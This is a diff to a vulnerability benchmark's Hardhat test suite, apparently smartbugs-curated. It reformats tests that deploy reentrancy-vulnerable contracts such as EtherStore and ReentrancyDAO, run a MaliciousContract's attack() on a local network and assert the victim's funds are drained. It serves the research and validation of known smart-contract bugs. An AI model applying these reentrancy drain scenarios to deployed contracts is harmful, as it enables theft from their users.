expect(victim.Collect(ethers.parseEther('10'))).to.not.be.reverted; + it("sanity check: reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); it("should successfully drain funds through reentrancy attack", async function () { // Initial deposit to victim contract - await victim.Put( 0, {value: ethers.parseEther("5") }); - - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + await victim.Put(0, { value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + await hacker.deposit({ value: ethers.parseEther("5") }); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); //set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); let hackerBalance = await ethers.provider.getBalance(hacker.target); expect(hackerBalance).to.equal(0); // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("3")); + await hacker.attack(ethers.parseEther("3")); - // Check balances after attack const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); // Verify the attack was successful - + // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("7")); + expect(victimBalance).to.be.below(ethers.parseEther("7")); - // hacker has more than the withdrawal + // hacker has more than the withdrawal expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); - }); }); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_test.js index 8c00614..95e5f2d 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_test.js @@ -12,69 +12,79 @@ describe("Reentrancy Attack for 0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol", beforeEach(async function () { // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol/Log.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol/Log.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy MY_BANK contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol/MY_BANK.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol/MY_BANK.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); MY_BANK = await ethers.getContractFactory(json.abi, json.bytecode); victim = await MY_BANK.deploy(log.target); await victim.waitForDeployment(); - + // Deploy MaliciousContract with MY_BANK address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); - }); - it('sanity check: reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol', async function () { - await expect(victim.Put(0, { value: ethers.parseEther('10') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther('10'))).to.not.be.reverted; + it("sanity check: reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); it("should successfully drain funds through reentrancy attack", async function () { // Initial deposit to victim contract - await victim.Put( 0, {value: ethers.parseEther("3") }); - - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("3")); + await victim.Put(0, { value: ethers.parseEther("3") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("3")); // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + await hacker.deposit({ value: ethers.parseEther("5") }); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("8")); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("8")); //set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); let hackerBalance = await ethers.provider.getBalance(hacker.target); expect(hackerBalance).to.equal(0); // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("3")); + await hacker.attack(ethers.parseEther("3")); - // Check balances after attack const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); // Verify the attack was successful - + // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("5")); + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // hacker has more than the withdrawal + // hacker has more than the withdrawal expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); - }); }); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/etherstore_test.js b/smartbugs-curated/0.4.x/test/reentrancy/etherstore_test.js index 7e010e1..4a16d2a 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/etherstore_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/etherstore_test.js @@ -2,76 +2,81 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for etherstore.sol", function () { - let EtherStore; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for etherstore.sol", function () { + let EtherStore; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract + beforeEach(async function () { + // Deploy Log contract - // Deploy EtherStore contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/etherstore.sol/EtherStore.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - EtherStore = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await EtherStore.deploy(); - await victim.waitForDeployment(); - //await victim.setLog(log.target); // Set Log address after deployment + // Deploy EtherStore contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/etherstore.sol/EtherStore.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + EtherStore = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await EtherStore.deploy(); + await victim.waitForDeployment(); + //await victim.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with EtherStore address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/etherstore_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with EtherStore address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/etherstore_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/etherstore.sol', async function () { - await expect(victim.depositFunds({ value: ethers.parseEther('1') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("1")); - await expect(victim.withdrawFunds(ethers.parseEther('1'))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/etherstore.sol", async function () { + await expect(victim.depositFunds({ value: ethers.parseEther("1") })).to.not + .be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("1"), + ); + await expect(victim.withdrawFunds(ethers.parseEther("1"))).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.depositFunds( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.depositFunds({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("2") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("1")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("1")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("6")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("6")); - // hacker has more than the withdrawal - expect(hackerBalance).to.be.above(ethers.parseEther("1")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(hackerBalance).to.be.above(ethers.parseEther("1")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/modifier_reentrancy_test.js b/smartbugs-curated/0.4.x/test/reentrancy/modifier_reentrancy_test.js index 2f0af83..02be652 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/modifier_reentrancy_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/modifier_reentrancy_test.js @@ -2,65 +2,62 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for modifier_reentrancy.sol", function () { - let ModifierEntrancy; - let victim; - let contract; - let MaliciousContract; - let hacker; - - beforeEach(async function () { - // Deploy Log contract - - // Deploy ModifierEntrancy contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/modifier_reentrancy.sol/ModifierEntrancy.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - ModifierEntrancy = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await ModifierEntrancy.deploy(); - await victim.waitForDeployment(); - - const Bank = await ethers.getContractFactory("contracts/reentrancy/modifier_reentrancy_benign.sol:BankBenign"); - contract = await Bank.deploy(victim.target); - - // Deploy MaliciousContract with ModifierEntrancy address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/modifier_reentrancy_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); - - it('sanity check: reentrancy/modifier_reentrancy.sol', async function () { - await expect(contract.airDrop()).to.not.be.reverted; - expect(await victim.tokenBalance(contract.target)).to.equal("20"); - }); - - it("should successfully drain funds through reentrancy attack", async function () { - - - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); - - let hackerBalanceOnVictim= await victim.tokenBalance(hacker.target); - expect(hackerBalanceOnVictim).to.equal("0"); - - // Perform reentrancy attack through MaliciousContract - await hacker.initiateAttack(); - - // Check balances after attack on the victim contract - const victimBalance = await victim.tokenBalance(victim.target); - hackerBalanceOnVictim= await victim.tokenBalance(hacker.target); - - - // Verify the attack was successful - - - // we verified the hacker has more than the 20 from first call - expect(hackerBalanceOnVictim).to.be.above("20"); - - }); - }); - \ No newline at end of file +describe("Reentrancy Attack for modifier_reentrancy.sol", function () { + let ModifierEntrancy; + let victim; + let contract; + let MaliciousContract; + let hacker; + + beforeEach(async function () { + // Deploy Log contract + + // Deploy ModifierEntrancy contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/modifier_reentrancy.sol/ModifierEntrancy.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + ModifierEntrancy = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await ModifierEntrancy.deploy(); + await victim.waitForDeployment(); + + const Bank = await ethers.getContractFactory( + "contracts/reentrancy/modifier_reentrancy_benign.sol:BankBenign", + ); + contract = await Bank.deploy(victim.target); + + // Deploy MaliciousContract with ModifierEntrancy address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/modifier_reentrancy_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); + + it("sanity check: reentrancy/modifier_reentrancy.sol", async function () { + await expect(contract.airDrop()).to.not.be.reverted; + expect(await victim.tokenBalance(contract.target)).to.equal("20"); + }); + + it("should successfully drain funds through reentrancy attack", async function () { + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); + + let hackerBalanceOnVictim = await victim.tokenBalance(hacker.target); + expect(hackerBalanceOnVictim).to.equal("0"); + + // Perform reentrancy attack through MaliciousContract + await hacker.initiateAttack(); + + // Check balances after attack on the victim contract + const victimBalance = await victim.tokenBalance(victim.target); + hackerBalanceOnVictim = await victim.tokenBalance(hacker.target); + + // Verify the attack was successful + + // we verified the hacker has more than the 20 from first call + expect(hackerBalanceOnVictim).to.be.above("20"); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/reentrance_test.js b/smartbugs-curated/0.4.x/test/reentrancy/reentrance_test.js index 29fe679..8e8cb66 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/reentrance_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/reentrance_test.js @@ -2,76 +2,83 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for reentrance.sol", function () { - let Reentrance; - let victim; - let MaliciousContract; - let hacker; +describe("Reentrancy Attack for reentrance.sol", function () { + let Reentrance; + let victim; + let MaliciousContract; + let hacker; - beforeEach(async function () { - // Deploy Log contract + beforeEach(async function () { + // Deploy Log contract - // Deploy Reentrance contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/reentrance.sol/Reentrance.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - Reentrance = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await Reentrance.deploy(); - await victim.waitForDeployment(); + // Deploy Reentrance contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/reentrance.sol/Reentrance.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + Reentrance = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await Reentrance.deploy(); + await victim.waitForDeployment(); - // Deploy MaliciousContract with Reentrance address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/reentrance_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with Reentrance address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/reentrance_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/reentrance.sol', async function () { - const [sig] = await ethers.getSigners(); - expect(await victim.balanceOf(sig.address)).to.equal(0); - await expect(victim.connect(sig).donate(sig.address, {value: ethers.parseEther('1')})).to.not.be.reverted; - expect(await victim.balanceOf(sig.address)).to.equal(ethers.parseEther('1')); - await expect(victim.connect(sig).withdraw(ethers.parseEther('1'))).to.not.be.reverted - expect(await victim.balanceOf(sig.address)).to.equal(0); - }); + it("sanity check: reentrancy/reentrance.sol", async function () { + const [sig] = await ethers.getSigners(); + expect(await victim.balanceOf(sig.address)).to.equal(0); + await expect( + victim + .connect(sig) + .donate(sig.address, { value: ethers.parseEther("1") }), + ).to.not.be.reverted; + expect(await victim.balanceOf(sig.address)).to.equal( + ethers.parseEther("1"), + ); + await expect(victim.connect(sig).withdraw(ethers.parseEther("1"))).to.not.be + .reverted; + expect(await victim.balanceOf(sig.address)).to.equal(0); + }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.donate(victim.target, { value: ethers.parseEther("5") }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.donate( victim.target, {value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("4") }); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("9")); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("4")}); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("9")); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("1")); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("1")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("8")); - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("8")); - - // hacker has more than the withdrawal - expect(hackerBalance).to.be.above(ethers.parseEther("1")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(hackerBalance).to.be.above(ethers.parseEther("1")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_bonus_test.js b/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_bonus_test.js index 7f2e349..be7d22c 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_bonus_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_bonus_test.js @@ -2,68 +2,62 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for reentrancy_bonus.sol", function () { - let Reentrancy_bonus; - let victim; - let MaliciousContract; - let hacker; - - beforeEach(async function () { - // Deploy Log contract - - // Deploy PrivateBank contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/reentrancy_bonus.sol/Reentrancy_bonus.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - Reentrancy_bonus = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await Reentrancy_bonus.deploy(); - await victim.waitForDeployment(); - - // Deploy MaliciousContract with Reentrancy_bonus address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/reentrancy_bonus_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); - - it('sanity check: reentrancy/reentrancy_bonus.sol', async function () { - await expect(victim.withdrawReward(hacker.target)).to.not.be.reverted; - }); - - it("should successfully drain funds through reentrancy attack", async function () { - // Add funds to the contract by sending ether directly - await network.provider.send("hardhat_setBalance", [ - victim.target, - "0x0100" , - ]); - - - // Check the contract balance to confirm funds were added - const balance = await ethers.provider.getBalance(victim.target); - expect(balance).to.equal(256); - - - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); - - - - // Perform reentrancy attack through MaliciousContract - await hacker.attack(); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); - - // Verify the attack was successful - - // hacker gets more than the initial bonus 100 - expect(hackerBalance).to.be.above(100); - - - }); - }); - \ No newline at end of file +describe("Reentrancy Attack for reentrancy_bonus.sol", function () { + let Reentrancy_bonus; + let victim; + let MaliciousContract; + let hacker; + + beforeEach(async function () { + // Deploy Log contract + + // Deploy PrivateBank contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/reentrancy_bonus.sol/Reentrancy_bonus.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + Reentrancy_bonus = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await Reentrancy_bonus.deploy(); + await victim.waitForDeployment(); + + // Deploy MaliciousContract with Reentrancy_bonus address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/reentrancy_bonus_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); + + it("sanity check: reentrancy/reentrancy_bonus.sol", async function () { + await expect(victim.withdrawReward(hacker.target)).to.not.be.reverted; + }); + + it("should successfully drain funds through reentrancy attack", async function () { + // Add funds to the contract by sending ether directly + await network.provider.send("hardhat_setBalance", [ + victim.target, + "0x0100", + ]); + + // Check the contract balance to confirm funds were added + const balance = await ethers.provider.getBalance(victim.target); + expect(balance).to.equal(256); + + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); + + // Perform reentrancy attack through MaliciousContract + await hacker.attack(); + + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); + + // Verify the attack was successful + + // hacker gets more than the initial bonus 100 + expect(hackerBalance).to.be.above(100); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_dao_test.js b/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_dao_test.js index fe294f1..597c652 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_dao_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_dao_test.js @@ -2,75 +2,78 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for reentrancy_dao.sol", function () { - let ReentrancyDAO; - let victim; - let MaliciousContract; - let hacker; +describe("Reentrancy Attack for reentrancy_dao.sol", function () { + let ReentrancyDAO; + let victim; + let MaliciousContract; + let hacker; - beforeEach(async function () { - // Deploy Log contract + beforeEach(async function () { + // Deploy Log contract - // Deploy EtherStore contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/reentrancy_dao.sol/ReentrancyDAO.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - ReentrancyDAO = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await ReentrancyDAO.deploy(); - await victim.waitForDeployment(); - //await victim.setLog(log.target); // Set Log address after deployment + // Deploy EtherStore contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/reentrancy_dao.sol/ReentrancyDAO.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + ReentrancyDAO = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await ReentrancyDAO.deploy(); + await victim.waitForDeployment(); + //await victim.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with ReentrancyDAO address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/reentrancy_dao_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with ReentrancyDAO address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/reentrancy_dao_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/reentrancy_dao.sol', async function () { - await expect(victim.deposit({value:ethers.parseEther('1')})).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther('1')); - await expect(victim.withdrawAll()).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/reentrancy_dao.sol", async function () { + await expect(victim.deposit({ value: ethers.parseEther("1") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("1"), + ); + await expect(victim.withdrawAll()).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("1") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("1")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("6")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("6")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack({ gasLimit: 30000000 }); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack({ gasLimit: 30000000 }); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has les money than expected - expect(victimBalance).to.be.below(ethers.parseEther("5")); + // victim has les money than expected + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // hacker has more than the initial withdrawal - expect(hackerBalance).to.be.above(ethers.parseEther("1")); - - - }); - }); - \ No newline at end of file + // hacker has more than the initial withdrawal + expect(hackerBalance).to.be.above(ethers.parseEther("1")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_simple_test.js b/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_simple_test.js index e7225ff..64cdf33 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_simple_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/reentrancy_simple_test.js @@ -2,74 +2,77 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for reentrancy_simple.sol", function () { - let Reentrance; - let victim; - let MaliciousContract; - let hacker; +describe("Reentrancy Attack for reentrancy_simple.sol", function () { + let Reentrance; + let victim; + let MaliciousContract; + let hacker; - beforeEach(async function () { - // Deploy Log contract + beforeEach(async function () { + // Deploy Log contract - // Deploy EtherStore contract with Log address - const codePath = path.join(__dirname, 